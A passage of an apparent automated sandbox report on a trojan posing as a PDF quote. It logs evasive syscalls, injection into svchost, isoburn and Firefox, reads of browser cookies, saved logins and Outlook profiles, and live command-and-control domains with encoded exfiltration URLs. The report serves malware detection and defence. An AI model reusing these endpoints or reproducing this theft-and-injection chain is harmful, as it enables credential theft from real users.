            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 7456Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008Jump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EB8A73 LogonUserW,0_2_00EB8A73
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E63B4C
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E64A35
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC4CFA mouse_event,0_2_00EC4CFA
            Source: C:\Users\user\Desktop\quote894590895pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\quote894590895pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EB81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EB81D4
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC4A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00EC4A08
            Source: quote894590895pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: quote894590895pdf.exe, csDaoUagQFfwf.exe, 00000005.00000002.3585252874.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000000.2048560536.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000000.2197135003.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: csDaoUagQFfwf.exe, 00000005.00000002.3585252874.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000000.2048560536.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000000.2197135003.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: csDaoUagQFfwf.exe, 00000005.00000002.3585252874.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000000.2048560536.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000000.2197135003.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: csDaoUagQFfwf.exe, 00000005.00000002.3585252874.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000000.2048560536.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000000.2197135003.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E887AB cpuid 0_2_00E887AB
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E95007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E95007
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EA215F GetUserNameW,0_2_00EA215F
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E940BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00E940BA
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E64AFE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: quote894590895pdf.exeBinary or memory string: WIN_81
            Source: quote894590895pdf.exeBinary or memory string: WIN_XP
            Source: quote894590895pdf.exeBinary or memory string: WIN_XPe
            Source: quote894590895pdf.exeBinary or memory string: WIN_VISTA
            Source: quote894590895pdf.exeBinary or memory string: WIN_7
            Source: quote894590895pdf.exeBinary or memory string: WIN_8
            Source: quote894590895pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00ED6399
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00ED685D
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            2
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets151
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531713 Sample: quote894590895pdf.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 28 www.i8ty.xyz 2->28 30 www.030002832.xyz 2->30 32 10 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 quote894590895pdf.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 csDaoUagQFfwf.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 isoburn.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 csDaoUagQFfwf.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.ddzc.store 154.82.70.195, 50015, 50016, 50017 ROOTNETWORKSUS Seychelles 22->34 36 b-ambu.com 84.32.84.32, 49946, 49962, 49979 NTT-LT-ASLT Lithuania 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            quote894590895pdf.exe37%ReversingLabsWin32.Trojan.Swotter
            quote894590895pdf.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            trencheslondon.store
            3.33.130.190
            truetrue
              unknown
              wishlists.fun
              3.33.130.190
              truetrue
                unknown
                www.ddzc.store
                154.82.70.195
                truetrue
                  unknown
                  www.weeksee.net
                  172.232.112.221
                  truetrue
                    unknown
                    www.i8ty.xyz
                    207.154.246.21
                    truetrue
                      unknown
                      030002832.xyz
                      65.21.196.90
                      truetrue
                        unknown
                        b-ambu.com
                        84.32.84.32
                        truetrue
                          unknown
                          www.webeuz.buzz
                          75.2.103.23
                          truetrue
                            unknown
                            www.wishlists.fun
                            unknown
                            unknowntrue
                              unknown
                              www.030002832.xyz
                              unknown
                              unknowntrue
                                unknown
                                www.b-ambu.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.trencheslondon.store
                                  unknown
                                  unknowntrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.030002832.xyz/k59q/true
                                      unknown
                                      http://www.wishlists.fun/j5xl/?Vt8pNT=UbSkj6Vbkzt4xk/BQnnYbYTXmRPkUKt1YkqUNfRg8HqP8fdFaUbTKuozRqV2B7LpcmAJePLPvqhI8UaQpGGHaeFBe2TuO5Ibc+NjtYApVRqMFDlNrBJ0s0I=&e4x=ktCxONu0true
                                        unknown
                                        http://www.trencheslondon.store/bba0/true
                                          unknown
                                          http://www.trencheslondon.store/bba0/?Vt8pNT=z2tBdSkYWISVZlGeY1UMjB+aahxirAP0BGL3+4ox4Yqg2ZTTHsJ+XsYwiumYoM/4lsnVRmhb/JIyqNziYYbWgSouB4vi/+UmCom1xZAxGA7QHOLM5wPW2IM=&e4x=ktCxONu0true
                                            unknown
                                            http://www.b-ambu.com/iuk8/true
                                              unknown
                                              http://www.030002832.xyz/k59q/?Vt8pNT=pYctcHUd+6Fx/IsQ6ix4omD59tSF7jXbTnpFZTzQh111IIx+Ebp2Fnu84te/oL49aHMAArF6WbZdbX7DMbbg+4GhF928ELxk6g386YHHrAtOiLYQc82sN3s=&e4x=ktCxONu0true
                                                unknown
                                                http://www.i8ty.xyz/0gyy/?Vt8pNT=pcEhds/h42nAYAT0LBaH8yStEyuK9E/vhBYbG/7jpbqcIU9VeO8n0URcBUZr7wQGt8dA+7YpmgvBimgGVM12DtGPEZbYI7iEEo2c2QS/At3BiK+lDzdQYd4=&e4x=ktCxONu0true
                                                  unknown
                                                  http://www.weeksee.net/4p3r/?Vt8pNT=LOIXgNA6yVbIhH/97YISWpaaeYXaQBHJvGCpm6n32QVnUTq8xwvOH/+QlB31wK7nJw4esWbzPeXe8oRJ9Ty3LI5fbZj0io6+NlMHOgvhq63Ws7W9v5i5bXc=&e4x=ktCxONu0true
                                                    unknown
                                                    http://www.weeksee.net/4p3r/true
                                                      unknown
                                                      http://www.webeuz.buzz/pw0n/true
                                                        unknown
                                                        http://www.i8ty.xyz/0gyy/true
                                                          unknown
                                                          http://www.b-ambu.com/iuk8/?e4x=ktCxONu0&Vt8pNT=rMW8FEGQdm97FGtaoxXiHNwQVR6R/A+6gHbLU36mRaIlSKTub3c0+o2OYHMPzrTne2tl6yO2tBcnHpARWLNmulEVVzZjbBkPJkvKkDIrLUALH1enLsdJRAo=true
                                                            unknown
                                                            http://www.ddzc.store/u1em/true
                                                              unknown
                                                              http://www.ddzc.store/u1em/?e4x=ktCxONu0&Vt8pNT=KznUpk/xHe6n1X9mtj5I6E8xs3xw/O5MevsqvgsUAqRDUKoafro8pFGdMZBnRKuB8O2sPyUarQrP+wlcZkakd0lPWPqUfDTmoYHoDPqwNuY6qLwvsQiX+Fs=true
                                                                unknown
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://ac.ecosia.org/autocomplete?q=isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://duckduckgo.com/chrome_newtabisoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://duckduckgo.com/ac/?q=isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.030002832.xyzcsDaoUagQFfwf.exe, 00000007.00000002.3587672328.000000000566F000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.ecosia.org/newtab/isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
